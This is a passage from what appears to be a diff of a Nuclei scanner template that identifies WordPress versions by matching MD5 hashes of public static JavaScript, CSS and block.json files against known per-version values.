dsl: + - "(\"0e5f0f7ec50672e362cfe3d619df3963\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"dfdcb2b3ede87acb1c69f68cc4e0ad5b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/wordcount.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"baee04dfe8fe19a1395c4764b3090e94\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"84adf32df85853051c4b4ff443579381\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"ec3e571129e51f249ba65f8510707637\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"1fbda7deaa611689cc829b97827de193\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"826c22d037cd314617169491f20321b6\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"bc24959774d006d11d22d9c30fef277f\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"e1880d9750e3d4598129644286fb579b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/escape-html.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"3d16ddce4596d2becd5a1600a222ad0f\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"1ed6a1ab0cb9e680c7e22fcdf23fc038\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"47aeb04222c3631c12d89f92f555c640\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"23cd8626f3e0d2006526f4c71b2deae5\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"db931b70025bb3f46d853926909e3d0d\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"153e7aebcae5f3708ce08c5300b87af1\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"486125227a8a0f2489d8214ddfc7e933\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/editor/editor-styles.min.css" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"6d86ff0ca33033ac9a036e21f0b0ea9e\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"6d969457c228c76ad1f8ecc9fddbedf4\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"6e1baf257d970da5013b5c5f3340ef3e\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"4a98fa4de2c4af7e9ecfedfde88e80a1\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"1f30ad7edc4eb4beaf09a019f47f7e4f\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"7d3cd9c728b30fc554ac4c4eb7b9cda3\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"91db91761b326cc094a5a777078669d7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/editor/editor-styles-rtl.min.css" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"6d86ff0ca33033ac9a036e21f0b0ea9e\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"6d969457c228c76ad1f8ecc9fddbedf4\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"6e1baf257d970da5013b5c5f3340ef3e\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"4a98fa4de2c4af7e9ecfedfde88e80a1\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"e7cc458c8a91418a8907411c401d7639\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"9d08900a8ecb0ceea1b7ec671090a00d\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"98dfb074ec9260ec1db6560c43f3a3b6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/block-library/theme.min.css" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"bfa7dc8c1c5e86d37ba25252afe3602e\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"5ca26d4ea597b0f25b8477a5e344c89b\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"182ddba2abac4cdd9ffda9ac1e64e4b9\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"80145dc9e4908a34d14ca5a87d33c6d7\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"74f22f7553d243dff615e40cf7ec2230\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"9bd313fbce9688ed85c407ad4d0a7c13\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"fedc9311ebafd1704b6a71d3a5b3101a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/block-library/theme-rtl.min.css" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"6d0ba66f6e7fcfdcba9bdaeb1dcad3c0\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"093a87e5f49cc3e10411d9a87bb36eb3\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"bb8862f82ae8dcdf5282216377ef773a\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"3eeaac647e4cd06679739d9554c96c86\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"a7692be7a7705e33788f67cce7f39207\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"3440f48f66bc6f461f0dfc60d98e5842\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"3ca7c8161a0b2f04d28e77f93d790c0a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/url.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.2 + dsl: + - "(\"123a422f86b67054286b77b4e0ea5d02\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"4d6c78efb41747c864b4dc24c5c7f939\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"d4037f627561122928f7e7cc40f65f46\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"35acce22efd4f6d2f6f9475813822cd2\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"1d84b37530e4cc75fed81422d0f9b646\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"1f746ad199999bfaf7a396f2065f8e9c\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"52d4b4d3bc9a76cc7cb1b424070fb4bc\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"6f0f4cf71f4117e4889c02103129be92\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/hooks.js" + matchers: + - type: dsl + name: 5.0 - 5.0.2 + dsl: + - "(\"0c02dc3d6405f21e0e7ecba519a64e58\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"d1495ca6445d4be01ea2c604ffad2c91\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"625c7a6a70d2656655dab6eb11d3bcab\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"23352b6c517082b20c00a8b7214f0b3b\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"6dff5d62e5015eb8cb03988ca4fcfeb0\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"c7a2e00fdaae21ee9c5481b3e56c095e\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"08b8807b992956f5597724f2e13784e1\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"74a454248e71b2fd42b694ddf167bfb8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/url.js" + matchers: + - type: dsl + name: 5.0 - 5.0.2 + dsl: + - "(\"c229754f4b3d48a28bd2b498a3888fd4\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"026d66222af818d4aab9a2059165b064\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"5afa4e8668c3aaa88a476e3165b7d70f\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"74be87956d50685416bcf70b16b57785\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"edc8ad80ceb6b53aaf28e6610da3ca5b\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"769b16ac7a8892fb251c9f6c48c43fc4\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"34238cd53e89196494b742144a34ba0a\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"f66560251f29ae02c2f93ea50a58e9e1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/hooks.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.2 + dsl: + - "(\"a2b646c038a4717d8b1b5aca69c9670e\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"372901e50eb2d47eb24cb57a62aaa7f2\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"4e18512bfeb2e32f419cd82da8bfb799\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"d9fd81f370f535bb10e54ea7c42ef099\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"843d3122e1c99ce1e77ba5e67ad29de3\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"37f5274faecba356e91142961b5c14ef\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"8646afb0a68683c9d04b87191415d34e\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"2464cde73ceddee1f4a34cf49c122b60\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/site-health.js" + matchers: + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"cfbfe6b77305e9f9d3e33fec6d32cb5f\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"37c6ab849b0abab3b2aec4f3f47f05a9\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"27504fbc4b0045d55cad6f3f2919d6b4\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"f803f97346bc19b891a2261dec8c48fc\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"dbc04a3e2f3db6cb48a8fb72f7ed5cec\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/site-health.min.js" + matchers: + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"496175569dcb05e5cb145c2b84abafc8\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"c999b140e1d7d2c45c7c70f6bbcb99e2\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"742d3d24998e12859938b2cc09176e2a\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"3d7752688d52db5e3cf0db77c35b9f2c\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"d47cf1b26ab79bd2b68f66c16fbc48d1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/priority-queue.min.js" + matchers: + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"ec4d6cdbbbcb33554355e37e60d780e4\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"517ae9e1dae4d245f2b071dad50bbb33\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"9f6335c2e10c8a11ec2f895cbd1b1af7\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"0b4c4c0dd3ccaa8f9fb79de4959a91fe\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"7c7f08d3d51daa67b5616c721d4ee200\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/priority-queue.js" + matchers: + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"14abf08e7d04fcb87075c1648604a5a9\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"9ec356d434b7a09e112bf1c086b7bfb4\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"9d389c12bf9e0f25d6324d2226ca785f\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"cddf31c844ff08b4db7cef406b0346a9\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"b91af19e9e2df7d57b61c24f0100abfe\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/customize-base.js" + matchers: + - type: dsl + name: 4.7.4 - 4.8.15 + dsl: + - "(\"0cdc710a8f36181a0c701a3ce7e5997b\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.3 + dsl: + - "(\"8cade945b4a89d043762f80bcaed87aa\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"272674ffd71d5383e454ba023edc570c\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"161a6177aa359e2bc78e839ad6ee8d51\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"a1e0ef60b56dc0d59f03ff150c319f2b\" == md5(body))" + - type: dsl + name: 4.2 - 4.3.25 + dsl: + - "(\"5dca30a4679d1aedaacebd16a4a1a0ff\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"99408cfe66225d657d6bfe59611e4237\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"678187f7f110f020dcb64a0bcd62c9b8\" == md5(body))" + - type: dsl + name: 3.8 - 3.9.33 + dsl: + - "(\"aa275db98d31c41c3ea6b0a701b8a892\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"62f799465f3922f79057f8c1e17f123f\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"f435c162b8ac5353e9b9f92de1882cf8\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"44c9ce1c5ef5e1516a8bcc08f42931a2\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"811878a3509b308b50bc004360e5eec7\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"6b9e78b6f87828a337c31e5f4d474795\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"d62e95f2aa34f1627648655ace1a1cfc\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"4365654cc960b21fc7bc03d2ac311b02\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/image-edit.js" + matchers: + - type: dsl + name: 4.8 - 4.9.4 + dsl: + - "(\"c8bd51029ca05bb65b49f80025b5fc5c\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.19 + dsl: + - "(\"16a3cb26cb0814a231d58b38c97df814\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"6c814dd18a8c2eaab9ecb52ac319a85c\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"646b0f05bb16169872ac68c1087c0a90\" == md5(body))" + - type: dsl + name: 4.2 - 4.3.25 + dsl: + - "(\"c21931f1eecd6c1532a4c2ca7a7faa5e\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"f4da63e5c9c6e64e67d9662965af69d8\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"5701a93d854686d6a6f26f64216fe14f\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"aa560e6d9e2c20598fe08dda9bad82b3\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"abee7dc06e6c318e85deb3db101b518a\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"f2e5873b4cc923135fef4ebb4991e0ef\" == md5(body))" + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"8d71200d96c8b58ccf6f2bb3a249ed95\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"6edbe79ea0c3df5123d2667feb05a36f\" == md5(body))" + - type: dsl + name: 2.9 - 3.1.4 + dsl: + - "(\"42df1d1f6cd6db258307ed95b60b9168\" == md5(body))" + - type: dsl + name: 4.9.5 - 5.0.11 + dsl: + - "(\"b6c28ba4d4b1419cb5cf936cc277f0f2\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"288062dd616078315bcefc5f3813462c\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"d05e5dcd5ec0b6f3573c77da40f6004c\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"f08b314e90861026d8db2654bf4ec6c6\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"b2f16bcb08802029cb7c4a3cc18c132c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/format-library/style-rtl.min.css" + matchers: + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"0e7d5e83a110cada2dcbb79e0ebb5cf5\" == md5(body))" + - type: dsl + name: 5.2 - 5.3.6 + dsl: + - "(\"cf8bddec90a1c79917947c459e8768ce\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"5fc495995010c25fdaa23948992ff3ba\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"967f85719949bb31b665e4759cdb5c65\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"d7873eea88f51925f7931278b66c383f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/format-library/style.min.css" + matchers: + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"0e7d5e83a110cada2dcbb79e0ebb5cf5\" == md5(body))" + - type: dsl + name: 5.2 - 5.3.6 + dsl: + - "(\"cf8bddec90a1c79917947c459e8768ce\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"f2902dc84667bd1b40b44b7640a460d0\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"b85c22e11453d8882434239e440bdf43\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"5624a5d450c4fc3b32a33bcc9e06fd83\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/tags-suggest.js" + matchers: + - type: dsl + name: 4.7.4 - 5.0.11 + dsl: + - "(\"e6b0ed85e26e70669c5715c7ad0f093e\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.3 + dsl: + - "(\"8be7404f47238690d2661ef0c1b03481\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"fc09cd4b84504470a8169de1fbe1846a\" == md5(body))" + - type: dsl + name: 5.2 - 5.3.6 + dsl: + - "(\"1e0f50a2947ccda6a1f9afbc3563b1d5\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"d25ce9bfcd49f45ea2ce2639f63a9c3f\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"b7c4d1698941cc299ec1b81ec26a80a9\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"ab7f70969944f6ac429616610542932a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/warning.min.js" + matchers: + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"db84831d55cfdc51f2075773c00912a2\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"fa2ec0ed8220902d50cb63f6fee7366d\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"f4625750128afe29806e059d8bdfc89b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/primitives.min.js" + matchers: + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"b70293a44a87ef96f637a3ff1acfc953\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"2ddfbe528847785917cb8314634786d9\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"7982311ac531784ab798c99884ccdcde\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/keyboard-shortcuts.min.js" + matchers: + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"be47a44af031a2f1a43344b4a44b109d\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"0ad6c510e007f87d0a3bf8ad111377a5\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"02c511abc7b66279bb9215c9659984e2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/warning.js" + matchers: + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"1b2a453cfcaaff346039ed7f5ea57295\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"7fba13943ca2930a4e770b309a02cd2a\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"68b1863f629cb550f0fdb6d5620081c7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/block-directory.js" + matchers: + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"a8ec7b77bde5f5059dc94054b07cf6f4\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"4876f234deeedb192153d6293b0245d2\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"c7f462e97c803fceef094806d711a664\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/primitives.js" + matchers: + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"5bf9f9a06b6d328e64e577074b404805\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"4e440209ae2331748dd08e417c3a7d59\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"1258f4c2c0ddc004a90ad76d4bb03032\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/keyboard-shortcuts.js" + matchers: + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"760c1b3492ab6365c275bfc2a77ae176\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"6ecee2ba7a57ae5437f6b9a8aa3e10dc\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"d8006549ce04ebfc622625a691c1abe1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/block-directory.min.js" + matchers: + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"d832c5cd8bd0da9512d8848863fa16ed\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"0e66af7f7e7dc0b76569010a26590e37\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"04dfad9a3e54344c9de5438d8afaac0c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/block-directory/style-rtl.min.css" + matchers: + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"09cf9b46feeca59fd0a9382bd232c4c8\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"ab529cd63991c549bc36ce30dd68c660\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"d9da8d9eb02483ddebcedf7644794705\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/block-directory/style.min.css" + matchers: + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"053280c146e2bf08a28230a29faad58f\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"1d7929892c1d4955c6183a758c28c48e\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"a720f09e5780bea0126c26f2c21082c7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/social-link/block.json" + matchers: + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"6ea2b5c0ac1460e01ba67030b2a81180\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"1558f03f0a0dae63d39d2c69c71bb771\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"8c04a371745f9db987ec9a600d1308b7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/shortcode/block.json" + matchers: + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"e911185397e7871463ed951bbdaf1489\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"d78388efddb5da069353622bc5b0d7fb\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"fbc8238045192ff64ee68476f008a83a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/selectable.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"b632add191ecae92e6a7b6b97212a640\" == md5(body))" + - type: dsl + name: 4.2 - 4.5.23 + dsl: + - "(\"51f19c22fb1d7b1bbf428b4de4f01fce\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"a61647fd50e892d148bf77fab886afd2\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"91167a07312f0c7cf9eadbb6211fa2d5\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"df30b5088b7511a63e4e3195c9667a88\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/menu.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"c91cfff50715441295fe7463bb5d3894\" == md5(body))" + - type: dsl + name: 4.2 - 4.5.23 + dsl: + - "(\"279b59ffd3e6ed2da1397cb06ce13ec0\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"685fb2f73a372f615a6981a8cd1d2444\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"2bc433c534a14d09f1f8a2d060ebc7eb\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"d77da8d28a3e05fb5cbf9af4e4156f34\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/datepicker.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"cfb63dc18fde53fef4d4fdc19ddfdcd6\" == md5(body))" + - type: dsl + name: 4.3 - 4.5.23 + dsl: + - "(\"82e28aae0e34a07a0b13ce604d021b14\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"499a4efa077515f0e4025141e22b0290\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"2391c6781dad9871a02cca33c1782f4b\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"70b4930dc8e018f851f8530c330b1456\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"c5d96ab0b66c433e5ce4c4d1038612b5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/tooltip.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"443f68690d84eee42cf3019071340730\" == md5(body))" + - type: dsl + name: 4.2 - 4.5.23 + dsl: + - "(\"b75d47d283918bef01b8cdcc4045511e\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"c841c027f1139ce197b43a9e4ea65420\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"26c741acbef3207eb8c79483cbc08dde\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"533fcffa5cae261dff515b72f5c0139a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/dialog.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"3ecd9590aac778514f4e69975ed91a62\" == md5(body))" + - type: dsl + name: 4.2 - 4.5.23 + dsl: + - "(\"24036156f5137bd484089907f52c9530\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"03468b0f0ceb0ccce25de28ffed83efd\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"d0933f1e5b9b5592dd5e219f7eba2f14\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"add449e75da55bc682631a7f9d12fafc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/draggable.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"443c277789baf69c490019d59c1b36ed\" == md5(body))" + - type: dsl 